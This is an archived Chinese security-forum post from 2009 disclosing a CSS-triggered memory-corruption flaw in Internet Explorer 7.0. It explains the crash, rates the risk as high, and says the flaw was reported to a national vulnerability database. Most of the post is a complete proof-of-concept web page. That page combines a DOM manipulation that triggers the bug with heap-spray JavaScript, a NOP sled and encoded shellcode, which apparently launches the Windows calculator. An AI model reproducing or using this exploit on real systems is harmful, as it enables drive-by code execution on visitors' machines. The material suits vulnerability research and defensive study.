标题: 发现微软IE7.0 异常CSS导致内存破坏漏洞 [打印本页]

---

作者: zclzhao    时间: 2009-11-23 14:11     标题: 发现微软IE7.0 异常CSS导致内存破坏漏洞

1．漏洞介绍
在XHTML 1.0标准下，使用特殊构造的CSS样式，在Internet Explorer 7.0 打开特定的网页后，Internet Explorer 7.0将发生内存崩溃，EIP指针将访问0x70613e5b附近的内存区域。如果将0x70613e5b附近覆盖特殊的机器码，就可以执行任意命令。
  
2．漏洞危害(危害等级高)
黑客如果将含有“漏洞利用程序的网页”置于网站上，浏览过含有“漏洞利用程序的网页”的客户端将被运行特洛伊木马。
  
3．通知途径
已经向“国家漏洞库”提交。
  
4．详细文档下载
  
POC:
  
更多安全漏洞公布，请关注www.3ast.com.cn 3AST网络安全论坛:www.3ast.com.cn

1. <!--
   
2. 请将以下内容粘贴到html文件中,利用成功后，会启动windows计算器程序
   
3. [url]http://www.3ast.com.cn[/url]
   
4. -->
   
5. 
   
6. 
   
7. <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
8. <HTML xmlns="http://www.w3.org/1999/xhtml">  
   
9.     <HEAD>
   
10. <script>   
    
11.             function load(){
    
12.                 var e;
    
13.                 e=document.getElementsByTagName("STYLE")[0];
    
14.                 e.outerHTML="1";  
    
15.             }
    
16.         </script>      
    
17.         <STYLE type="text/css">
    
18.             body{ overflow: scroll; margin: 0; }
    
19.         </style>
    
20.          
    
21.         <SCRIPT language="javascript">
    
22. var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
    
23. var bigblock = unescape("%u9090%u9090");
    
24. var headersize = 20;
    
25. var slackspace = headersize+shellcode.length;
    
26. while (bigblock.length<slackspace) bigblock+=bigblock;
    
27. fillblock = bigblock.substring(0, slackspace);
    
28. block = bigblock.substring(0, bigblock.length-slackspace);
    
29. while(block.length+slackspace<0x40000) block = block+block+fillblock;
    
30. memory = new Array();
    
31. for (x=0; x<4000; x++) memory[x] = block + shellcode;
    
32. </script>
    
33.   
    
34.     </HEAD>     
    
35.     <BODY onload="load()">
    
36.     </BODY>
    
37. </HTML>  

复制代码

//3ast.com.cn

---

欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)

Powered by Discuz! 7.2